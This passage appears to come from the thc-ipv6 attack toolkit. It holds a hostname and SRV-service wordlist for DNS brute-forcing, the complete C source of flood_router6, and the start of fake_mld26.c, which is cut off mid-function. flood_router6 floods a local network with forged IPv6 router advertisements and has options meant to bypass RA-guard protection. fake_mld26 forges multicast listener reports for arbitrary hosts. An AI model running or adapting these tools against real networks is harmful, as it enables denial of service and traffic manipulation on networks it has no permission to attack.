"wd18", "wd19", "wd2", "wd20", "wd21", "wd22", "wd23", "wd24", "wd25", "wd26", "wd27", "wd28", "wd29", "wd3", "wd30", "wd31", "wd32", "wd33", "wd34", "wd35", "wd36", "wd37", "wd38", "wd39", "wd4", "wd40", "wd41", "wd42", "wd43", "wd44", "wd45", "wd46", "wd47", "wd48", "wd49", "wd5", "wd50", "wd51", "wd52", "wd53", "wd54", "wd55", "wd56", "wd57", "wd58", "wd59", "wd6", "wd60", "wd61", "wd62", "wd63", "wd64", "wd65", "wd66", "wd67", "wd68", "wd69", "wd7", "wd70", "wd71", "wd72", "wd73", "wd74", "wd75", "wd76", "wd77", "wd78", "wd79", "wd8", "wd80", "wd81", "wd82", "wd83", "wd84", 
"wd85", "wd86", "wd87", "wd88", "wd89", "wd9", "wd90", "wd91", "wd92", "wd93", "wd94", "wd95", "wd96", "wd97", "wd98", "wd99", "wds", "we", "weasel", "weather", "web", "web-01", "web-02", "web-1", "web-2", "web-wap", "web-wap2", "web0", "web01", "web02", "web03", "web04", "web05", "web06", "web07", "web08", "web09", "web1", "web10", "web11", "web12", "web13", "web14", "web15", "web16", "web17", "web18", "web19", "web2", "web20", "web21", "web22", "web23", "web24", "web25", "web26", "web27", "web28", "web29", "web3", "web30", "web31", "web32", "web4", "web5", "web6", "web7", "web8", "web9", "webaccess", "webadmin", "webadvisor", "webalizer", "webapp", "webapp1", "webapps", "webapps03", "webauth", "webb", "webboard", "webcache", "webcam", "webcam1", "webcam2", "webcast", "webchat", "webcon", "webconf", "webct", "webdav", "webdb", "webdemo", "webdev", "webdev1", "webdocs", "weber", "webfarm", "webfilter", "webftp", "webgate", "webhelp", "webhost", "webhost1", "webhost2", "webhosting", "weblib", "weblog", "weblogic", "webmail", "webmail01", "webmail02", "webmail1", "webmail2", "webmail3", "webmail4", "webmaster", "webmin", "webportal", "webproxy", "webqa", "webring", "webs", "websense", "webserv", "webserv1", "webserver", "webserver01", "webserver1", "webserver2", "webserver3", "webservice", "webservices", "webshield", "webshop", "website", "websites", "websphere", "websrv", "websrv01", "websrv1", "websrvr", "webstats", "webster", "webstore", "websvr", "webtest", "webtest01", "webtrends", "webvpn", "webwork", "wedge", "weed", "wega", "weiss", "welcome", "welcome1", "welcome2", "welcome3", "welcome4", "well", "wellington", "wells", "wendy", "werner", "wes", "wesley", "west", "westvirginia", "wet", "wf", "wg", "wh", "wh1", "whale", "what", "whatever", "whatsup", "wheat", "wheel", "when", "whiskey", "whisky", "whisper", "whistle", "whistler", "white", "whitney", "whm", "who", "whois", "wholesale", "why", "wi", "wichita", "wide", "widget", "widgets", "wien", "wiener", 
"wif", "wifi", "wifi1", "wifi2", "wiggum", "wigner", "wii", "wiki", "wilbur", "wild", "wildcard", "wildcat", "wililiam", "will", "william", "williams", "willie", "willing", "willow", "willy", "wilma", "wilson", "win", "win01", "win02", "win1", "win2", "win2000", "win2003", "win2008", "win2k", "win2k3", "win2k8", "win3", "win4", "win7", "wind", "window", "windows", "windows01", "windows02", "windows1", "windows2", "windows2000", "windows2003", "windows2008", "windows7", "windowsvista", "windowsxp", "wine", "wing", "wingate", "winner", "winnie", "winnt", "winproxy", "wins", "winserve", "winston", "winter", "wintermute", "winxp", "wire", "wired", "wireless", "wireless1", "wireless2", "wisconsin", "wisdom", "wise", "wish", "witty", "wizard", "wj", "wk", "wl", "wlan", "wlan-ap1-dynamic", "wlan-ce1-dynamic", "wlan-sw1-dynamic", "wlan1", "wlan2", "wlan6", "wlc", "wm", "wm1", "wm2", "wmail", "wms", "wn", "wo", "wolf", "wolfgang", "wolverine", "wombat", "wonder", "wonderful", "wont", "wood", "woodpecker", "woods", "woodstock", "woody", "wopr", "word", "wordpress", "worf", "work", "worker", "workflow", "workplace", "works", "workshop", "workspace", "workstation", "world", "worm", "wormhole", "worth", "worthwhile", "wotan", "wow", "wowza", "wp", "wp1", "wpad", "wq", "wr", "wraith", "wren", "wrench", "wright", "write", "writer", "writing", "wrt", "ws", "ws0", "ws01", "ws02", "ws03", "ws04", "ws05", "ws06", "ws07", "ws08", "ws09", "ws1", "ws10", "ws11", "ws12", "ws13", "ws14", "ws15", "ws16", "ws17", "ws18", "ws19", "ws2", "ws20", "ws21", "ws22", "ws23", "ws24", "ws25", "ws26", "ws27", "ws28", "ws29", "ws3", "ws30", "ws31", "ws32", "ws33", "ws34", "ws35", "ws36", "ws37", "ws38", "ws39", "ws4", "ws40", "ws41", "ws42", "ws43", "ws44", "ws45", "ws46", "ws47", "ws48", "ws49", "ws5", "ws50", "ws51", "ws52", "ws53", "ws54", "ws55", "ws56", "ws57", "ws58", "ws59", "ws6", "ws60", "ws61", "ws62", "ws63", "ws64", "ws65", "ws66", "ws67", "ws68", "ws69", "ws7", "ws70", "ws71", "ws72", 
"ws73", "ws74", "ws75", "ws76", "ws77", "ws78", "ws79", "ws8", "ws80", "ws81", "ws82", "ws83", "ws84", "ws85", "ws86", "ws87", "ws88", "ws89", "ws9", "ws90", "ws91", "ws92", "ws93", "ws94", "ws95", "ws96", "ws97", "ws98", "ws99", "wsm", "wss", "wsus", "wt", "wtf", "wts", "wu", "wug", "wusage", "wv", "ww", "ww0", "ww00", "ww01", "ww02", "ww03", "ww1", "ww2", "ww3", "ww4", "ww5", "www", "www-", "www-0", "www-00", "www-01", "www-02", "www-03", "www-1", "www-2", "www-3", "www-6", "www-a", "www-dev", "www-int", "www-ipv6", "www-new", "www-old", "www-test", "www-v6", "www-v6v4", "www0", "www00", "www01", "www02", "www03", "www04", "www05", "www06", "www07", "www08", "www1", "www10", "www11", "www12", "www13", "www14", "www15", "www16", "www17", "www18", "www19", "www2", "www20", "www21", "www22", "www23", "www24", "www25", "www26", "www27", "www28", "www29", "www3", "www30", "www31", "www32", "www33", "www34", "www35", "www36", "www37", "www38", "www4", "www40", "www41", "www42", "www5", "www50", "www51", "www6", "www6test", "www7", "www8", "www9", "wwwchat", "wwwdev", "wwwipv6", "wwwmail", "wwwmg", "wwwold", "wwwqa", "wwwqamg", "wwws", "wwwtest", "wwwtest6", "wwwtst", "wwwv6", "wwww", "wx", "wy", "wyoming", "wyvern", "wz", "x", "x-ray", "x1", "x10", "x11", "x12", "x13", "x14", "x15", "x2", "x21", "x22", "x23", "x24", "x25", "x3", "x4", "x5", "x6", "x7", "x8", "x9", "xa", "xanadu", "xanthus", "xavier", "xb", "xbox", "xc", "xchange", "xcii", "xd", "xdmcp", "xe", "xe-0-0-0", "xe-0-1-0", "xe-0-2-0", "xe-0-2-0-0", "xe-0-3-0", "xe-1-0-0", "xe-1-1-0", "xe-1-2-0-0", "xe-1-3-0", "xe-2-0-0", "xe-2-1-0", "xe-3-0-0", "xen", "xen01", "xen02", "xen03", "xen1", "xen2", "xen3", "xen4", "xen5", "xena", "xenapp", "xenon", "xeon", "xerox", "xerxes", "xf", "xfer", "xg", "xh", "xi", "xj", "xk", "xl", "xlogan", "xm", "xmail", "xml", "xml1", "xmpp", "xmpp-client", "xmpp-server", "xn", "xnet", "xo", "xp", "xpilot", "xq", "xr", "xray", "xs", "xserve", "xserve1", "xserve2", "xserver", "xt", 
"xtel", "xtell", "xu", "xv", "xw", "xx", "xxx", "xy", "xyz", "xz", "y", "y1", "ya", "yahoo", "yak", "yam", "yamato", "yang", "yankee", "yavin", "yb", "yc", "yd", "ye", "year", "yellow", "yellowstone", "yes", "yeti", "yew", "yf", "yg", "yggdrasil", "yh", "yi", "yin", "yj", "yk", "yl", "ym", "ymir", "yn", "yo", "yoda", "yogi", "york", "yosemite", "yoshi", "you", "young", "your", "youth", "yp", "yq", "yr", "ys", "yt", "yts", "yts1", "yts2", "yttrium", "yu", "yucca", "yuki", "yukon", "yum", "yuri", "yv", "yw", "yx", "yy", "yz", "z", "z-atman", "z-log", "z-tpnetu", "z1", "z2", "z3", "z3950", "za", "zabbix", "zap", "zaphod", "zapp", "zappa", "zarafa", "zb", "zc", "zcs", "zd", "ze", "zealous", "zebra", "zebrasrv", "zed", "zelda", "zen", "zenith", "zeno", "zenon", "zenoss", "zephyr", "zeppelin", "zeppo", "zera", "zerberus", "zero", "zeta", "zeus", "zeus2", "zf", "zg", "zh", "zi", "ziggy", "zim", "zimbra", "zimbra1", "zinc", "zion", "zip", "zippy", "zircon", "zirconium", "zix01", "zixgateway01", "zixvpm", "zixvpm01", "zixvpm02", "zj", "zk", "zl", "zlog", "zm", "zmail", "zn", "zo", "zodiac", "zoe", "zoidberg", "zombie", "zone", "zoo", "zoom", "zoot", "zope", "zorro", "zp", "zq", "zr", "zs", "zserv", "zt", "zu", "zulu", "zurich", "zuse", "zuul", "zv", "zvs", "zw", "zx", "zy", "zz", "" }; char *sub_srv_test[] = { "_1password", "_abi-instrument", "_xmpp-server", "_xmpp-client", "_http", "_https", "_sip", "_sips", "_hydra", "_hyperstream", "_iax", "_foo", "_pop3", "_imap", "_abc", "_zzz", "" }; char *sub_srv[] = { "_1password", "_abi-instrument", "_accessdata-f2d", "_accessdata-f2w", "_accessone", "_accountedge", "_acrobatsrv", "_actionitems", "_activeraid", "_activeraid-ssl", "_addressbook", "_adisk", "_adobe-vc", "_adpro-setup", "_a-d-sync", "_aecoretech", "_aeroflex", "_afpovertcp", "_airport", "_airprojector", "_airsharing", "_airsharingpro", "_amba-cam", "_amiphd-p2p", "_animobserver", "_animolmd", "_anquetsync", "_appelezvous", "_apple-ausend", "_apple-midi", "_applerdbg", 
"_apple-sasl", "_appletv", "_appletv-itunes", "_appletv-pair", "_aquamon", "_asr", "_astnotify", "_astralite", "_async", "_atlassianapp", "_auth", "_autodiscover", "_av", "_axis-video", "_b3d-convince", "_babyphone", "_bdsk", "_beacon", "_beamer", "_beatpack", "_beep", "_bfagent", "_bigbangchess", "_bigbangmancala", "_bittorrent", "_blackbook", "_bluevertise", "_bookworm", "_bootps", "_boundaryscan", "_bousg", "_bri", "_bsqdea", "_busycal", "_caltalk", "_cardsend", "_cctv", "_cheat", "_chess", "_chfts", "_chili", "_cip4discovery", "_clipboard", "_clique", "_clscts", "_collection", "_com-ocs-es-mcc", "_contactserver", "_corroboree", "_cpnotebook2", "_cvspserver", "_cw-codetap", "_cw-dpitap", "_cw-oncetap", "_cw-powertap", "_cytv", "_daap", "_dacp", "_dancepartner", "_dataturbine", "_device-info", "_difi", "_disconnect", "_distcc", "_dist-opencl", "_ditrios", "_divelogsync", "_dltimesync", "_dns-llq", "_dns-sd", "_dns-update", "_domain", "_dop", "_dossier", "_dpap", "_dropcopy", "_dsl-sync", "_dtrmtdesktop", "_dvbservdsc", "_dxtgsync", "_ea-dttx-poker", "_earphoria", "_eb-amuzi", "_ebms", "_ebreg", "_ecbyesfsgksc", "_ecms", "_edcp", "_egistix", "_eheap", "_embrace", "_ep", "_eppc", "_erp-scale", "_esp", "_eucalyptus", "_eventserver", "_evs-notif", "_ewalletsync", "_example", "_exb", "_exec", "_extensissn", "_eyetvsn", "_facespan", "_fairview", "_faxstfx", "_feed-sharing", "_firetask", "_fish", "_fix", "_fjork", "_fl-purr", "_fmpro-internal", "_fmserver-admin", "_fontagentnode", "_foxtrot-serv", "_foxtrot-start", "_frameforge-lic", "_freehand", "_frog", "_ftp", "_ftpcroco", "_fv-cert", "_fv-key", "_fv-time", "_garagepad", "_gbs-smp", "_gbs-stp", "_gforce-ssmp", "_glasspad", "_glasspadserver", "_glrdrvmon", "_gpnp", "_grillezvous", "_growl", "_guid", "_h323", "_h323cs", "_h323ls", "_helix", "_help", "_hg", "_hinz", "_hmcp", "_homeauto", "_home-sharing", "_honeywell-vid", "_hotwayd", "_howdy", "_hpr-bldlnx", "_hpr-bldwin", "_hpr-db", "_hpr-rep", "_hpr-toollnx", 
"_hpr-toolwin", "_hpr-tstlnx", "_hpr-tstwin", "_hs-off", "_htsp", "_http", "_https", "_hydra", "_hyperstream", "_iax", "_ibiz", "_ican", "_ica-networking", "_ichalkboard", "_ichat", "_iconquer", "_idata", "_idcws", "_idsync", "_ifolder", "_ihouse", "_ii-drills", "_ii-konane", "_ilynx", "_imap", "_imaps", "_imidi", "_indigo-dvr", "_inova-ontrack", "_ipbroadcaster", "_ipp", "_ipspeaker", "_irelay", "_irmc", "_iscsi", "_ishare", "_isparx", "_ispq-vc", "_isticky", "_istorm", "_itis-device", "_itsrc", "_ivef", "_iwork", "_jcan", "_jabber", "_jabber-conference", "_jeditx", "_jini", "_jtag", "_kerberos", "_kerberos-adm", "_kerberos-iv", "_kerberos-master", "_kpasswd", "_ktp", "_labyrinth", "_lan2p", "_lanrevagent", "_lanrevserver", "_lapse", "_ldap", "_leaf", "_lexicon", "_liaison", "_library", "_llrp", "_llrp-secure", "_lobby", "_logicnode", "_login", "_lonbridge", "_lontalk", "_lonworks", "_lsys-appserver", "_lsys-camera", "_lsys-ezcfg", "_lsys-oamp", "_lux-dtp", "_lxi", "_lyrics", "_macfoh", "_macfoh-admin", "_macfoh-audio", "_macfoh-data", "_macfoh-db", "_macfoh-events", "_macfoh-remote", "_macminder", "_maestro", "_magicdice", "_mandos", "_matrix", "_mbconsumer", "_mbproducer", "_mbserver", "_mconnect", "_mcrcp", "_mediaboard1", "_mesamis", "_mimer", "_mi-raysat", "_modolansrv", "_moneysync", "_moneyworks", "_moodring", "_mother", "_movieslate", "_mp3sushi", "_mqtt", "_mslingshot", "_mttp", "_mumble", "_musicmachine", "_mxim-art2", "_mxim-ice", "_mxs", "_mysync", "_ncbroadcast", "_ncdirect", "_ncsyncserver", "_neoriders", "_net2display", "_net-assistant", "_netrestore", "_newton-dock", "_nfs", "_nicname", "_nssocketport", "_ntlx-arch", "_ntlx-ent", "_ntlx-video", "_ntp", "_ntx", "_obf", "_objective", "_oce", "_odabsharing", "_odisk", "_od-master", "_officetime-sync", "_ofocus-conf", "_ofocus-sync", "_olpc-activity1", "_oma-bcast-sg", "_omni-bookmark", "_omni-live", "_openbase", "_opencu", "_oprofile", "_oscit", "_ovready", "_owhttpd", "_owserver", "_p2pchat", 
"_panoply", "_parabay-p2p", "_parentcontrol", "_parliant", "_passwordwallet", "_pcast", "_pdl-datastream", "_pgpkey-hkp", "_pgpkey-http", "_pgpkey-https", "_pgpkey-ldap", "_pgpkey-mailto", "_photoparata", "_pictua", "_piesync", "_piu", "_poch", "_pokeeye", "_pop3", "_pop3s", "_postgresql", "_powereasy-erp", "_powereasy-pos", "_pplayer-ctrl", "_presence", "_print-caps", "_printer", "_printer._sub._http", "_profilemac", "_prolog", "_protonet", "_psap", "_psia", "_ptnetprosrv2", "_ptp", "_ptp-req", "_puzzle", "_qbox", "_qttp", "_quinn", "_radioepg", "_radiotag", "_radiovis", "_rakket", "_raop", "_rbr", "_rce", "_rdp", "_realplayfavs", "_recipe", "_remote", "_remoteburn", "_renderpipe", "_rendezvouspong", "_renkara-sync", "_resacommunity", "_resol-vbus", "_retrospect", "_rfb", "_rfbc", "_rfid", "_riousbprint", "_roku-rcp", "_rql", "_rsmp-server", "_rsync", "_rtsp", "_rubygems", "_safarimenu", "_sallingbridge", "_sallingclicker", "_salutafugijms", "_sandvox", "_scanner", "_sc-golf", "_schick", "_scone", "_scpi-raw", "_scpi-telnet", "_sdsharing", "_see", "_seeCard", "_senteo-http", "_sentillion-vlc", "_sentillion-vlt", "_sepvsync", "_serendipd", "_servereye", "_servermgr", "_services", "_sessionfs", "_sflow", "_sftp-ssh", "_sge-exec", "_sge-qmaster", "_shell", "_shifter", "_shipsgm", "_shipsinvit", "_shoppersync", "_shoutcast", "_simmon", "_simusoftpong", "_sip", "_sips", "_sipuri", "_sironaxray", "_skype", "_sleep-proxy", "_slimcli", "_slimhttp", "_smartenergy", "_smb", "_sms", "_soap", "_socketcloud", "_souschef", "_sox", "_sparechange", "_sparql", "_spearcat", "_spike", "_spincrisis", "_splashsync", "_spl-itunes", "_spr-itunes", "_ssh", "_ssscreenshare", "_stanza", "_stickynotes", "_strateges", "_submission", "_supple", "_surveillus", "_svn", "_swcards", "_switcher", "_swordfish", "_sxqdea", "_sybase-tds", "_syncopation", "_syncqdea", "_synergy", "_synksharing", "_taccounting", "_tango", "_tapinoma-ecs", "_taskcoachsync", "_tbricks", "_tcode", "_tcu", "_teamlist", 
"_te-faxserver", "_teleport", "_telnet", "_tera-fsmgr", "_tera-mp", "_tf-redeye", "_tftp", "_thumbwrestling", "_ticonnectmgr", "_timbuktu", "_tinavigator", "_tivo-hme", "_tivo-music", "_tivo-photos", "_tivo-remote", "_tivo-videos", "_todogwa", "_tomboy", "_toothpicserver", "_touch-able", "_touch-remote", "_tri-vis-client", "_tri-vis-server", "_tryst", "_tt4inarow", "_ttcheckers", "_ttp4daemon", "_tunage", "_tuneranger", "_ubertragen", "_uddi", "_uddi-inq", "_uddi-pub", "_uddi-sec", "_uddi-sub", "_upnp", "_urlbookmark", "_uswi", "_utest", "_uwsgi", "_ve-decoder", "_ve-encoder", "_ve-recorder", "_visel", "_volley", "_vos", "_vue4rendercow", "_vxi-11", "_walkietalkie", "_webdav", "_webdavs", "_webissync", "_wedraw", "_we-jell", "_whamb", "_whistler", "_wired", "_witap", "_witapvoice", "_wkgrpsvr", "_workgroup", "_workstation", "_wormhole", "_writietalkie", "_ws", "_wtc-heleos", "_wtc-qels", "_wtc-rex", "_wtc-viscostar", "_wtc-wpr", "_wwdcpic", "_xcodedistcc", "_xgate-rmi", "_xgrid", "_xmms2", "_xmp", "_xmpp-client", "_xmpp-server", "_x-on", "_x-plane9", "_xsanclient", "_xsanserver", "_xsansystem", "_xserveraid", "_xsync", "_xtimelicence", "_xtshapro", "_xul-http", "_yakumo", "" };
thc-ipv6-2.5/flood_router6.c0000644000000000000000000001047012251022437014453 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

/* Print the usage text for flood_router6 and terminate with exit status -1. */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-HFD] interface\n\n", prg);
  printf("Flood the local network with router advertisements.\n");
  printf("-F/-D/-H add fragment/destination/hopbyhop header to bypass RA guard security.\n");
  // printf("Use -r to use raw mode.\n\n");
  exit(-1);
}

/*
 * flood_router6 entry point.
 *
 * Parses -D/-F/-H/-r, then loops forever: each iteration builds one ICMPv6
 * router advertisement addressed to ff02::1 and hands it to the thc-ipv6
 * library for sending.  Per iteration the last four bytes of the source MAC,
 * the matching bytes of the fe80:: source address and six bytes of the
 * advertised prefix are re-randomised; everything else in the packet is
 * constant.
 *
 * Returns -1 when a library call that builds the packet fails; the final
 * `return 0` is unreachable because the loop has no exit.
 */
int main(int argc, char *argv[]) {
  char *interface, mac[6] = "";
  unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
  unsigned char buf[56], buf2[6], buf3[1504];
  // NOTE(review): neither thc_resolve6() nor thc_get_multicast_mac() is checked for NULL here
  unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst);
  int size, mtu, i, type = NXT_ICMP6;
  unsigned char *pkt = NULL;
  // NOTE(review): cnt has no initialiser, yet it is read by cnt++ in the -F branch below
  int pkt_len = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, cnt, do_dst = 0, offset = 14;
  thc_ipv6_hdr *hdr = NULL;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  printf("!\n! Please note: flood_router6 is deprecated, please use flood_router26!\n!\n\n");

  // -F may be given several times (do_frag counts them); -H and -D are plain switches
  while ((i = getopt(argc, argv, "DFHr")) >= 0) {
    switch (i) {
    case 'r':
      thc_ipv6_rawmode(1);
      rawmode = 1;
      break;
    case 'F':
      do_frag++;
      break;
    case 'H':
      do_hop = 1;
      break;
    case 'D':
      do_dst = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 1)
    help(argv[0]);

  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);   // unbuffered so the progress dots show up immediately

  interface = argv[optind];
  mtu = 1500;
  size = 64;
  // NOTE(review): the three malloc() results are used without a NULL check
  ip6 = malloc(16);
  routerip6 = malloc(16);
  route6 = malloc(16);
  if (do_hdr_size)
    offset = do_hdr_size;

  // fixed first two MAC octets; octets 2..5 are randomised inside the loop
  mac[0] = 0x00;
  mac[1] = 0x18;
  // fe80:: source whose low 64 bits mirror the MAC (02:<mac1>:<mac2>:ff:fe:<mac3..5>)
  memset(ip6, 0, 16);
  ip6[0] = 0xfe;
  ip6[1] = 0x80;
  ip6[8] = 0x02;
  ip6[9] = mac[1];
  ip6[11] = 0xff;
  ip6[12] = 0xfe;
  // only bytes 0..7 of routerip6 are copied into route6 later; bytes 8..14 are never written
  routerip6[0] = 0x2a;
  routerip6[1] = 0x01;
  routerip6[15] = 0x01;
  memset(route6 + 8, 0, 8);
  memset(buf2, 0, sizeof(buf2));
  memset(buf3, 0, sizeof(buf3));

  // buf is the RA payload handed to thc_add_icmp6().  The option type/length
  // values below match RFC 4861 (5 = MTU, 3 = prefix information, 1 = source
  // link-layer address) -- assumes buf starts right after the 4 bytes passed
  // as the flags argument; confirm against thc_add_icmp6().
  memset(buf, 0, sizeof(buf));
  buf[1] = 250;
  buf[5] = 30;
  buf[8] = 5;                     // option type 5, length 1 (8 bytes): MTU
  buf[9] = 1;
  buf[12] = mtu / 16777216;       // mtu written big-endian into buf[12..15]
  buf[13] = (mtu % 16777216) / 65536;
  buf[14] = (mtu % 65536) / 256;
  buf[15] = mtu % 256;
  buf[16] = 3;                    // option type 3, length 4 (32 bytes): prefix information
  buf[17] = 4;
  buf[18] = size;                 // prefix length 64
  buf[19] = 128 + 64 + 32;        // top three flag bits set
  memset(&buf[20], 255, 8);       // the two 32-bit lifetime fields, all ones
  buf[48] = 1;                    // option type 1, length 1: link-layer address at buf[50..55]
  buf[49] = 1;

  printf("Starting to flood network with router advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
  while (1) {

    // new random MAC suffix and new random prefix bytes for every packet
    for (i = 2; i < 6; i++)
      mac[i] = rand() % 256;
    for (i = 2; i < 8; i++)
      routerip6[i] = rand() % 256;

    // NOTE(review): line breaks were lost on this page; the commented-out
    // statement is assumed to be only the ip6[9] assignment -- confirm against the upstream file
    // ip6[9] = mac[1];
    ip6[10] = mac[2];
    ip6[13] = mac[3];
    ip6[14] = mac[4];
    ip6[15] = mac[5];

    memcpy(route6, routerip6, 8);       // advertised prefix = 8 random-ish bytes + 8 zero bytes
    memcpy(&buf[32], route6, 16);
    memcpy(&buf[50], mac6, 6);

    count++;

    // hop limit 255, link-local source, all-nodes destination
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    // `type` remembers the first extension header that was added; it is only
    // used by the fragmenting send path below
    if (do_hop) {
      type = NXT_HBH;
      if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0)
        return -1;
    }
    if (do_frag) {
      if (type == NXT_ICMP6)
        type = NXT_FRAG;
      for (i = 0; i < do_frag; i++)
        if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
          return -1;
    }
    if (do_dst) {
      if (type == NXT_ICMP6)
        type = NXT_DST;
      if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
        return -1;
    }
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff08ffff, buf, sizeof(buf), 0) < 0)
      return -1;
    if (do_dst) {
      // with -D the packet is generated first and then re-sent in fragments;
      // the return value of thc_generate_pkt() is not checked on this path
      thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len);
      hdr = (thc_ipv6_hdr *) pkt;
      thc_send_as_fragment6(interface, ip6, dst, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240);
    } else {
      if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
        printf("!");   // a send failure is reported with '!' and the loop carries on
        // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
        // perror("");
        // return -1;
      }
    }

    pkt = thc_destroy_packet(pkt);
    // usleep(1);
    if (count % 1000 == 0)
      printf(".");
  }
  return 0;
}
thc-ipv6-2.5/fake_mld26.c0000644000000000000000000001473012251022435013575 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

// File-scope state of fake_mld26, shared between main() and the pcap callback check_packets()
int rawmode = 0;
char *multicast6 = NULL;
int empty = 0;

/* Print the usage text for fake_mld26 and terminate with exit status -1. */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-l] interface add|delete|query [multicast-address [target-address [ttl [own-ip [own-mac-address [destination-mac-address]]]]]]\n\n", prg);
  printf("This uses the MLDv2 protocol. Only a subset of what the protocol is able to\n");
  printf("do is possible to implement via a command line. 
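Code it if you need something.\n");
  printf("Ad(d)vertise or delete yourself - or anyone you want - in a multicast group of your choice\n");
  printf("Query ask on the network who is listening to multicast addresses\n");
  printf("Use -l to loop and send (in 5s intervals) until Control-C is pressed.\n");
  // printf("Use -r to use raw mode.\n\n");
  exit(-1);
}

/*
 * pcap callback: print the listeners announced by a captured MLD report.
 *
 * foo    - user pointer passed through by the capture loop; unused.
 * header - pcap metadata; only caplen (bytes actually captured) is read.
 * data   - captured frame; unless rawmode is set, the first 14 bytes are
 *          skipped before parsing.
 *
 * A packet is reported when its IPv6 next-header byte is 0, the following
 * header has next-header 0x3a, length byte 0 and option type 5, and the
 * ICMPv6 type is ICMP6_MLD2_REPORT or ICMP6_MLD_REPORT.  Unless `empty` is
 * set, only reports naming `multicast6` are printed (for MLDv2 the filter
 * looks at the first record only, as before).
 *
 * Everything parsed here comes off the wire, so the captured length is
 * checked before any fixed offset is read, and each MLDv2 record is sized
 * from its own aux-data-length and source-count fields instead of reusing
 * the fields of the first record.
 */
void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ptr = (unsigned char *) data;
  int nrecords, rec = 0, offset = 56, reclen, len = header->caplen;

  (void) foo;

  if (rawmode == 0) {
    if (len < 14)               // truncated capture: no complete link-layer header
      return;
    ptr += 14;
    len -= 14;
  }
  if (do_hdr_size) {
    if (len <= do_hdr_size - 14)        // nothing left to inspect behind the larger header
      return;
    ptr += (do_hdr_size - 14);
    len -= (do_hdr_size - 14);
    if ((ptr[0] & 240) != 0x60)
      return;
  }

  if (debug)
    thc_dump_data(ptr, len, "Received Packet");

  // the shortest packet of interest (MLDv1 report) is 72 bytes; refusing
  // anything shorter keeps the fixed-offset reads below inside the capture
  if (len < 72)
    return;
  if (ptr[6] != 0 || ptr[40] != 0x3a || ptr[41] != 0 || ptr[42] != 5)
    return;

  if (ptr[48] == ICMP6_MLD2_REPORT && len >= 76)
    if (empty == 1 || memcmp(multicast6, ptr + 60, 16) == 0) {
      nrecords = ptr[55];       // low byte of the record count only, as in the original
      // a record header plus its multicast address takes 20 bytes; stop as
      // soon as the next one would run past the captured data
      while (rec < nrecords && offset + 20 <= len) {
        if (ptr[offset] % 2 == 1)
          printf("MLD Report: %s is listening on %s\n", thc_ipv62notation(ptr + 8), thc_ipv62notation(ptr + offset + 4));
        else
          printf("MLD Report: %s was listening on %s\n", thc_ipv62notation(ptr + 8), thc_ipv62notation(ptr + offset + 4));
        // 20 fixed bytes + aux data (32-bit words) + 16 bytes per listed source
        reclen = 20 + ptr[offset + 1] * 4 + (ptr[offset + 2] * 256 + ptr[offset + 3]) * 16;
        offset += reclen;
        rec++;
      }
    }

  if (ptr[48] == ICMP6_MLD_REPORT)
    if (empty == 1 || memcmp(multicast6, ptr + 56, 16) == 0)
      printf("MLD Report: %s is listening on %s\n", thc_ipv62notation(ptr + 8), thc_ipv62notation(ptr + 56));
}

/*
 * fake_mld26 entry point.
 *
 * Positional arguments after the optional -r / -l switches:
 *   interface add|delete|query [multicast-address [target-address [ttl
 *   [own-ip [own-mac-address [destination-mac-address]]]]]]
 *
 * Builds one packet (IPv6 + hop-by-hop header + ICMPv6 MLDv2 report or MLD
 * query), sends it once or every 5 seconds with -l, and in query mode prints
 * the reports seen on the interface through check_packets().
 */
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL, buf[36];
  unsigned char *dst6 = NULL, *src6 = NULL, srcmac[16] = "", *mac = srcmac, dstmac[16] = "", *dmac = dstmac;
  int pkt1_len = 0, buflen = 36, i = 0, j;
  char *interface, string[64] = "ip6 and not udp and not tcp";   // capture filter handed to thc_pcap_init_promisc()
  int ttl = 1, mode = 0, wait = 1, loop = 0, actionmode = 0;
  pcap_t *p;

  memset(buf, 0, sizeof(buf));

  // -r is tested before and after -l, so the two switches are accepted in either order
  if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }
  if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-l") == 0) {
    loop = 1;
    argv++;
    argc--;
  }
  if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  interface = argv[1];
  // only the first three letters of the action are compared, case-insensitively.
  // actionmode becomes the record-type byte of the report (RFC 3810:
  // 3 = CHANGE_TO_INCLUDE_MODE, 4 = CHANGE_TO_EXCLUDE_MODE)
  if (strncasecmp(argv[2], "add", 3) == 0) {
    mode = ICMP6_MLD2_REPORT;
    actionmode = 3;
  }
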